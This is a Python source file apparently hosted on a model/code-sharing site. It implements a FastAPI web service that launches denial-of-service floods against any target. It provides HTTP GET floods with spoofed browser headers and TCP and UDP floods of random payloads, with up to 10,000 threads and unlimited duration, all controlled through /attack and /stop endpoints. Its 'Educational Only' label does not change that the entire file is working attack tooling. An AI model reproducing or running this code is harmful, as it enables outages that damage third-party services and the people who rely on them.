dstat / main.py
rkihacker's picture
Update main.py
76c30e9 verified
raw
history blame
4.96 kB
# main.py
import uvicorn
from fastapi import FastAPI, HTTPException
from pydantic import BaseModel
import threading
import requests
import time
import logging
import socket
import random
import struct
from typing import Optional, Literal
from concurrent.futures import ThreadPoolExecutor
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
app = FastAPI(title="Layer 7 + Layer 4 DDoS Testing Tool (Educational Only)")
# Global attack control
attack_active = False
attack_thread = None
executor = ThreadPoolExecutor(max_workers=10000) # Maximum power mode
class AttackConfig(BaseModel):
target: str
port: int = 80
duration: int = 30 # -1 for unlimited
threads: int = 100 # -1 for unlimited
attack_type: Literal["layer7", "tcp", "udp"] = "layer7"
payload_size: int = 1024 # For Layer 4 attacks
def generate_payload(size: int) -> bytes:
"""Generate random payload for Layer 4 attacks"""
return bytes(random.getrandbits(8) for _ in range(size))
def layer7_attack(target_url: str):
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Connection": "keep-alive",
"Cache-Control": "no-cache",
"Pragma": "no-cache"
}
session = requests.Session()
while attack_active:
try:
session.get(target_url, headers=headers, timeout=5, verify=False)
except:
pass
def layer4_attack(target_ip: str, port: int, protocol: str, payload_size: int):
sock = None
try:
if protocol == "tcp":
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.connect((target_ip, port))
else: # udp
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
while attack_active:
payload = generate_payload(payload_size)
if protocol == "tcp":
sock.send(payload)
else:
sock.sendto(payload, (target_ip, port))
time.sleep(0.01) # Small delay to prevent CPU overload
except Exception as e:
logger.error(f"Layer 4 attack error: {e}")
finally:
if sock:
sock.close()
def start_attack(config: AttackConfig):
global attack_active, attack_thread
attack_active = True
# Determine thread count
thread_count = config.threads if config.threads != -1 else 10000
# Build target URL for Layer 7
if config.attack_type == "layer7":
protocol = "https" if config.target.startswith("https") else "http"
target_url = f"{config.target}:{config.port}"
logger.info(f"Starting Layer 7 attack on {target_url} with {thread_count} threads")
for _ in range(thread_count):
executor.submit(layer7_attack, target_url)
else:
# Extract IP from target URL if needed
try:
target_ip = socket.gethostbyname(config.target.split("//")[-1].split("/")[0])
except:
raise HTTPException(status_code=400, detail="Invalid target URL")
logger.info(f"Starting {config.attack_type.upper()} attack on {target_ip}:{config.port} with {thread_count} threads")
for _ in range(thread_count):
executor.submit(layer4_attack, target_ip, config.port, config.attack_type, config.payload_size)
# Handle unlimited duration (-1)
if config.duration != -1:
time.sleep(config.duration)
stop_attack()
else:
logger.info("Attack running indefinitely until manually stopped")
def stop_attack():
global attack_active
attack_active = False
logger.info("Attack stopped.")
@app.post("/attack")
def launch_attack(config: AttackConfig):
global attack_thread
if attack_thread and attack_thread.is_alive():
raise HTTPException(status_code=400, detail="Attack already in progress")
# Validate thread count
if config.threads != -1 and config.threads > 10000:
raise HTTPException(status_code=400, detail="Max 10,000 threads allowed (use -1 for unlimited)")
# Validate duration
if config.duration != -1 and config.duration > 5000:
raise HTTPException(status_code=400, detail="Max duration 5000 seconds (use -1 for unlimited)")
# Validate payload size
if config.payload_size > 65507:
raise HTTPException(status_code=400, detail="Max payload size is 65507 bytes")
attack_thread = threading.Thread(target=start_attack, args=(config,), daemon=True)
attack_thread.start()
return {"status": "attack_started", "config": config}
@app.post("/stop")
def stop():
stop_attack()
return {"status": "attack_stopped"}
@app.get("/status")
def status():
return {"attack_active": attack_active}
if __name__ == "__main__":
uvicorn.run(app, host="0.0.0.0", port=8000)